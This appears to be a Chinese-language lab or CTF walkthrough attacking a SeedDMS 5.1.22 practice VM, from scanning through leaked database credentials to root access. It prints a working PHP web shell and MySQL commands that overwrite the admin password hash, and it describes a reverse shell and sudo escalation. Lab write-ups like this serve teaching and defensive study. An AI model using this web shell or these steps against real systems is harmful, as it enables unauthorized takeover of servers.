首先打开VMware然后导入到我们的虚拟机使用NAT模式,同时开启我们的kali。
使用kali的arpscan -l命令查看该网段存活的其他主机,发现192.168.13.144为我们的靶机
接下来使用nmap对144靶机进行详细的探测,发现开启了80和mysql3306端口
接下来去访问我们的靶机的80端口发现搭建的是一种类似博客的cms,
废话不多说,直接老套路上手对目录进行一个扫描,使用dirmap:python dirmap.py -i http://192.168.13.144/ -lcf
扫到了很多css和js文件,那就不能一个一个看了太浪费时间了,就挑重点的看,比如这个main.js文件,去访问这个文件
发现了这个cms的名字是seeddms,版本为5.1.22,去访问一下这个cms的路径
发现这是一个后台登录点,尝试弱口令之后无果,打算再看看其他的办法,想对这个cms查看是否有漏洞的,但是搜索显示没有5.1.22的版本漏洞。
通过 百度 seeddms 快速搭建,搜索到 该配置文件中含有 网站绝对路径 及数据库信息
seeddms51x/conf/settings.xml去访问一下这个路径
从这里可以发现泄露了数据库密码用户名等,尝试用kali去连接他的数据库
mysql -h 192.168.13.144 -useeddms -pseeddms -Dseeddms
Show databases;
Use seeddms
Show tables;
这两个表都看一下
select * from users;
select pwd,login from tblUsers;
把这串md5拿去解码但是没有成功
那就只能对密码进行修改了,真是情况下不建议这么做。
update tblUsers SET pwd=‘e10adc3949ba59abbe56e057f20f883e’ where login=‘admin’;
然后拿着账号:admin,密码:123456去登陆那个后台
上传一句话木马文件,文件名信息要一致
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd =($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
序号为4
获取反弹shell:
登入成功以后发现有上传点上传一个shell.php然后添加成功后看id号,然后我们要找上传后的绝对路径在下载的seeddms框架中找到了其数据存放的目录为1048576加上我们的序列号4
成功执行命令,接下来进行反弹shell,进行sudo提权
先查看有哪些用户,发现了一个在mysql中见到的用户,切换saket用户,这个用户的密码在之前的数据库里面看见了的
开启交换终端:python3 -c 'import pty;pty.spawn("/bin/bash")' 直接sudo -l sudo su 提权成功!
渗透测试到此结束
总结:
- 对于kali里面的漏洞库进行search的一个搜索。
- 对于数据库的一个操作指令执行命令。
- 反弹shell并且利用python3进行一个交互式的shell执行。